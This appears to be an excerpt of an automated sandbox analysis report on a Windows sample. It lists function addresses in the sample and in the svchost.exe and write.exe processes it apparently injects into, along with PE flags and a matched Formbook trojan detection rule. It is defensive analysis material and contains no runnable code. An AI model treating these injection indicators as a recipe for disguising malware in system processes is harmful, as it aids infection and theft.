            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0047E1FA | 0_2_0047E1FA
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0041A46B | 0_2_0041A46B
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0041240C | 0_2_0041240C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004045E0 | 0_2_004045E0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00412818 | 0_2_00412818
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0047CBF0 | 0_2_0047CBF0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0044EBBC | 0_2_0044EBBC
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00412C38 | 0_2_00412C38
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0044ED9A | 0_2_0044ED9A
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00424F70 | 0_2_00424F70
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0041AF0D | 0_2_0041AF0D
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00427161 | 0_2_00427161
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004212BE | 0_2_004212BE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00443390 | 0_2_00443390
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00443391 | 0_2_00443391
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0041D750 | 0_2_0041D750
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004037E0 | 0_2_004037E0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00427859 | 0_2_00427859
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0040F890 | 0_2_0040F890
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0042397B | 0_2_0042397B
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00411B63 | 0_2_00411B63
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00423EBF | 0_2_00423EBF
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_03ECD248 | 0_2_03ECD248
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418443 | 1_2_00418443
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401270 | 1_2_00401270
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EA03 | 1_2_0042EA03
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040221C | 1_2_0040221C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402220 | 1_2_00402220
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FCEF | 1_2_0040FCEF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FCF3 | 1_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402504 | 1_2_00402504
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402510 | 1_2_00402510
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004045E4 | 1_2_004045E4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041661E | 1_2_0041661E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416623 | 1_2_00416623
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FF13 | 1_2_0040FF13
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DF8A | 1_2_0040DF8A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DF93 | 1_2_0040DF93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402FA0 | 1_2_00402FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FA352 | 1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E3F0 | 1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033003E6 | 1_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C02C0 | 1_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03230100 | 1_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA118 | 1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C8158 | 1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F41A2 | 1_2_032F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033001AA | 1_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F81CC | 1_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240770 | 1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03264750 | 1_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323C7C0 | 1_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325C6E0 | 1_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240535 | 1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03300591 | 1_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E4420 | 1_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F2446 | 1_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EE4F6 | 1_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FAB40 | 1_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F6BD7 | 1_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323EA80 | 1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03256962 | 1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032429A0 | 1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330A9A6 | 1_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324A840 | 1_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03242840 | 1_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032268B8 | 1_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326E8F0 | 1_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03282F28 | 1_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03260F30 | 1_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E2F30 | 1_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B4F40 | 1_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BEFA0 | 1_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03232FC8 | 1_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FEE26 | 1_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240E59 | 1_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03252E90 | 1_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FCE93 | 1_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FEEDB | 1_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324AD00 | 1_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DCD1F | 1_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03258DBF | 1_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323ADE0 | 1_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240C00 | 1_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0CB5 | 1_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03230CF2 | 1_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F132D | 1_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322D34C | 1_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0328739A | 1_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032452A0 | 1_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E12ED | 1_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325D2F0 | 1_2_0325D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325B2C0 | 1_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0327516C | 1_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322F172 | 1_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330B16B | 1_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324B1B0 | 1_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F70E9 | 1_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FF0E0 | 1_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EF0CC | 1_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032470C0 | 1_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FF7B0 | 1_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03285630 | 1_2_03285630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F16CC | 1_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F7571 | 1_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DD5B0 | 1_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FF43F | 1_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03231460 | 1_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FFB76 | 1_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325FB80 | 1_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B5BF0 | 1_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0327DBF9 | 1_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B3A6C | 1_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FFA49 | 1_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F7A46 | 1_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DDAAC | 1_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03285AA0 | 1_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E1AA3 | 1_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EDAC6 | 1_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D5910 | 1_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03249950 | 1_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325B950 | 1_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AD800 | 1_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032438E0 | 1_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FFF09 | 1_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FFFB1 | 1_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03241F92 | 1_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03249EB0 | 1_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F7D73 | 1_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03243D40 | 1_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F1D5A | 1_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325FDC0 | 1_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B9C32 | 1_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FFCF2 | 1_2_032FFCF2
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_02840D5D | 5_2_02840D5D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_02842B0D | 5_2_02842B0D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_02842B09 | 5_2_02842B09
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_0286181D | 5_2_0286181D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_0284943D | 5_2_0284943D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_02849438 | 5_2_02849438
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_02840DA4 | 5_2_02840DA4
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_02840DAD | 5_2_02840DAD
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Code function: 5_2_02842D2D | 5_2_02842D2D
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04542446 | 6_2_04542446
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04534420 | 6_2_04534420
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0453E4F6 | 6_2_0453E4F6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04490535 | 6_2_04490535
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04550591 | 6_2_04550591
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044AC6E0 | 6_2_044AC6E0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044B4750 | 6_2_044B4750
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04490770 | 6_2_04490770
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0448C7C0 | 6_2_0448C7C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04522000 | 6_2_04522000
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04518158 | 6_2_04518158
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04480100 | 6_2_04480100
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0452A118 | 6_2_0452A118
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045481CC | 6_2_045481CC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045441A2 | 6_2_045441A2
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045501AA | 6_2_045501AA
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04530274 | 6_2_04530274
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045102C0 | 6_2_045102C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454A352 | 6_2_0454A352
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045503E6 | 6_2_045503E6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0449E3F0 | 6_2_0449E3F0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04490C00 | 6_2_04490C00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04480CF2 | 6_2_04480CF2
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04530CB5 | 6_2_04530CB5
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0449AD00 | 6_2_0449AD00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0452CD1F | 6_2_0452CD1F
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0448ADE0 | 6_2_0448ADE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044A8DBF | 6_2_044A8DBF
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04490E59 | 6_2_04490E59
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454EE26 | 6_2_0454EE26
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454EEDB | 6_2_0454EEDB
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454CE93 | 6_2_0454CE93
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044A2E90 | 6_2_044A2E90
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04504F40 | 6_2_04504F40
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04532F30 | 6_2_04532F30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044D2F28 | 6_2_044D2F28
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044B0F30 | 6_2_044B0F30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04482FC8 | 6_2_04482FC8
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0450EFA0 | 6_2_0450EFA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0449A840 | 6_2_0449A840
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04492840 | 6_2_04492840
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044BE8F0 | 6_2_044BE8F0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044768B8 | 6_2_044768B8
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044A6962 | 6_2_044A6962
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044929A0 | 6_2_044929A0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0455A9A6 | 6_2_0455A9A6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0448EA80 | 6_2_0448EA80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454AB40 | 6_2_0454AB40
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04546BD7 | 6_2_04546BD7
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04481460 | 6_2_04481460
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454F43F | 6_2_0454F43F
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04547571 | 6_2_04547571
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0452D5B0 | 6_2_0452D5B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044D5630 | 6_2_044D5630
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045416CC | 6_2_045416CC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454F7B0 | 6_2_0454F7B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044970C0 | 6_2_044970C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0453F0CC | 6_2_0453F0CC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454F0E0 | 6_2_0454F0E0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045470E9 | 6_2_045470E9
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C516C | 6_2_044C516C
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0447F172 | 6_2_0447F172
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0455B16B | 6_2_0455B16B
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0449B1B0 | 6_2_0449B1B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044AB2C0 | 6_2_044AB2C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044AD2F0 | 6_2_044AD2F0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045312ED | 6_2_045312ED
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044952A0 | 6_2_044952A0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0447D34C | 6_2_0447D34C
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0454132D | 6_2_0454132D
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044D739A | 6_2_044D739A
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04509C32 | 6_2_04509C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FCF26_2_0454FCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04493D406_2_04493D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04541D5A6_2_04541D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04547D736_2_04547D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AFDC06_2_044AFDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04499EB06_2_04499EB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FF096_2_0454FF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04453FD56_2_04453FD5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04453FD26_2_04453FD2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04491F926_2_04491F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FFB16_2_0454FFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044FD8006_2_044FD800
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044938E06_2_044938E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044999506_2_04499950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AB9506_2_044AB950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045259106_2_04525910
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04547A466_2_04547A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FA496_2_0454FA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04503A6C6_2_04503A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453DAC66_2_0453DAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044D5AA06_2_044D5AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04531AA36_2_04531AA3
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452DAAC6_2_0452DAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FB766_2_0454FB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04505BF06_2_04505BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044CDBF96_2_044CDBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AFB806_2_044AFB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E1B806_2_001E1B80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DCAB06_2_001DCAB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DCAAC6_2_001DCAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DCCD06_2_001DCCD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DAD506_2_001DAD50
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DAD476_2_001DAD47
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E52006_2_001E5200
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001D13A16_2_001D13A1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E33DB6_2_001E33DB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E33E06_2_001E33E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001FB7C06_2_001FB7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FE4B56_2_041FE4B5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FE3946_2_041FE394
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FE84C6_2_041FE84C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FD8B86_2_041FD8B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FCB3D6_2_041FCB3D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FCB786_2_041FCB78
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 044D7E54 appears 99 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 0447B970 appears 262 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 044C5130 appears 58 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 0450F290 appears 103 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 044FEA12 appears 86 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: String function: 0041718C appears 44 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03287E54 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0322B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032BF290 appears 103 times
            Source: r6lOHDg9N9.exe, 00000000.00000003.1712856043.000000000485D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs r6lOHDg9N9.exe
            Source: r6lOHDg9N9.exe, 00000000.00000003.1713194191.00000000046B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs r6lOHDg9N9.exe
            Source: r6lOHDg9N9.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
